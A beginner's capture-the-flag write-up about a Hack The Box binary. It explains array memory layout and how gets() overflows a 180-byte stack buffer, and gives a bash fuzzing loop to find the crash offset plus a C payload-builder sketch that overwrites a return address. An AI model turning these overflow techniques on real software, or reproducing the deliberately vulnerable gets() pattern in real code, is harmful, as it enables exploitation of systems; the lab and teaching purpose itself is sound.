Calculating Byte-offsets for Buffer Overflow Attacks
Buffer overflows are pretty neat.
I recently came across a challenge on HTB where we were given a simple binary that took in a user input and spit it right back out at us. Initially I used GHIDRA to dig through the binary for string values that might be useful (there weren't any). After some browsing of the disassembled code, we see a function called flag() defined in the binary. However, this function is never called by main(), so even though we're typing an input for the program, it's not actually doing anything with it other than spitting it right back out. The function that takes our input does use insecure C functions like gets, though, and from GHIDRA you can see there's a character array declared for the input buffer with a defined size of 180.
A “brief” tangent about arrays and memory
Without going too deep into programming (or computer architecture), there's an important fact to remember: an "array" is really just a contiguous block of memory, with its starting point being the memory address of the first element. The variable name we assign to the array is really just a label for a pointer to that first element's memory address. High-level languages like C or C++ allow us to iterate through an array with index notation - e.g. arr[i] - to access the contents of the array at that index. What's happening at the hardware level is that we take the base address of the array (let's say 1000) and add an offset of i*n, where n is the size of one element of the array's data type in bytes. So in short, arr[1] is really just shorthand for the value stored at memory address 1000 + (1*n).
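To make that concrete, here's a tiny C sketch (the array name and values are just for illustration) that prints the index notation and the underlying address arithmetic side by side:

#include <stdio.h>

int main(void) {
    int arr[4] = {10, 20, 30, 40};

    /* arr[i] and *(arr + i) are the same thing: the base address of the
     * array plus an offset of i * sizeof(int) bytes */
    for (int i = 0; i < 4; i++)
        printf("arr[%d] = %d at %p (base %p + %zu bytes)\n",
               i, arr[i], (void *)&arr[i], (void *)arr, i * sizeof(int));

    return 0;
}

On a typical machine where sizeof(int) is 4, each element sits exactly 4 bytes past the previous one - the same arithmetic the index notation is hiding from us.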
Why’s this important?
C is an incredibly powerful language. It allows us to interact directly with hardware, but that comes at the price of not having good checks in place to stop us from doing anything dumb. One of the dumb things we can do is access an out-of-bounds memory address through an array. In this case, we have a buffer of 180 characters, but what happens when we start feeding it inputs longer than 180? Eventually we're going to cause the program to crash with a segmentation fault. In simple terms, we try to access a part of memory that we shouldn't, and the computer gets angry at us and kicks us out.
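As a rough sketch of what the vulnerable input routine probably looks like (the variable name and the 180-byte size just mirror what GHIDRA showed - this isn't the challenge's actual source):

#include <stdio.h>

/* gets() was removed from the C standard (and from modern stdio.h) precisely
 * because it's this dangerous, so we declare it ourselves to get the toy to build */
char *gets(char *s);

int main(void) {
    char buf[180];   /* fixed-size buffer on the stack */

    /* gets() has no idea how big buf is - it keeps copying our input until it
     * hits a newline or EOF, happily writing past the end of the array */
    gets(buf);
    printf("%s\n", buf);
    return 0;
}

Anything past byte 180 spills onto whatever the stack has stored next to the buffer, which is exactly what we're going to abuse.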
Finding the point at which a program will encounter a segmentation fault
I'm not going to explain buffer overflows in this post, just try to tie together everything I've written about and why it's relevant. Finding the input length at which a segfault occurs is a really important step in performing a buffer overflow attack. However, we might not always have access to cool tools like gdb or GHIDRA that let us visualize a program's logic. So I thought to myself: how could I figure out what byte offset I'd need to get the program to go where I want it to go in memory (our goal being that flag() function)?
Imagine we have a program, vuln, and it only takes in an input. We can use something like python3 -c "print('A' * 69)" | ./vuln to generate a "payload" of 69 A's to use as our input. Since our input buffer can handle 180 characters, the program executes properly and exits without error. But what happens if we do python3 -c "print('A' * 181)" | ./vuln, which is 1 more character than our buffer? Huh… it still works… The same happens at 182 and 183, but when we hit 184, the program crashes - so 184 is the offset we'd need to use. (It usually doesn't crash at exactly one byte past the buffer because there tends to be some padding and other saved data between the end of the buffer and anything the program actually cares about; only once we clobber that do things blow up.)
What if the buffer is really big, or we don't know the buffer's size limit at all? How can we test efficiently without guessing for hours? That's where I decided to just automate it with a bash script.
Using Shell Exit Codes
Okay, so basically, any time we run a command in Linux we can echo $? immediately after to get that command's exit code (even something as "simple" as echo is a program). If the program executes and exits gracefully, the exit code, $?, will return 0. If it doesn't exit properly, $? gets set to some non-zero value instead.
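Where does that value come from? It's just whatever the program hands back when it finishes - the return value from main() or the argument passed to exit(). A tiny C program (the value 42 is made up) shows it:

#include <stdlib.h>

int main(void) {
    exit(42);   /* compile and run this, then `echo $?` prints 42 */
}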
To figure out what non-zero value a crash produces, we can just do something super obnoxious like start with a huge payload (e.g. python3 -c "print('A' * 1000000)" | ./vuln). After running that, we can echo $? to get our exit code - and since $? after a pipeline reflects the last command in the pipe, that's ./vuln's exit code, not python's. In the case of this challenge it happened to be 139, which makes sense: the shell reports 128 plus the terminating signal's number, and SIGSEGV is signal 11. Using that knowledge I came up with this script, which breaks once it gets an exit code of 139 back - signalling to us we hit the seg fault we were looking for.
#!/bin/bash
# Feed the binary longer and longer inputs until it segfaults
# (exit code 139 = 128 + SIGSEGV), then report the length that caused it.
n=0
while true
do
    n=$((n + 1))
    python3 -c "print('A' * $n)" | ./vuln &> /dev/null
    if [ $? -eq 139 ]; then
        echo "Offset = $n"
        break
    fi
done
Hope this is useful to anyone else getting started with buffer overflows. Really it's all about trial and error, and this is the starting point. You'd still need to fill the remaining bytes of the payload in a way that overwrites the return address with the address of the flag() function. Remember, the goal of a buffer overflow is to abuse vulnerable functions to overwrite the return address and get the binary to go where we want it to go and execute the code we want it to.
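As a very rough sketch of that next step - assuming a 32-bit little-endian binary, and with 0x080491e2 standing in as a completely made-up address for flag() (the real one would come from the disassembly or objdump -d) - a payload builder could look something like this, piped straight into the binary with ./payload | ./vuln:

#include <stdio.h>

#define OFFSET 184              /* the length our script reported */

int main(void) {
    unsigned int flag_addr = 0x080491e2;   /* placeholder address of flag() */

    /* filler bytes up to the point where the crash told us we start
     * stomping on saved stack data */
    for (int i = 0; i < OFFSET; i++)
        putchar('A');

    /* append the address bytes in native order (little-endian on x86),
     * hoping they land on the saved return address */
    fwrite(&flag_addr, sizeof flag_addr, 1, stdout);
    putchar('\n');
    return 0;
}

In practice you'd still tweak the filler length a few bytes in either direction until the return address lines up - which is exactly the trial and error I mentioned.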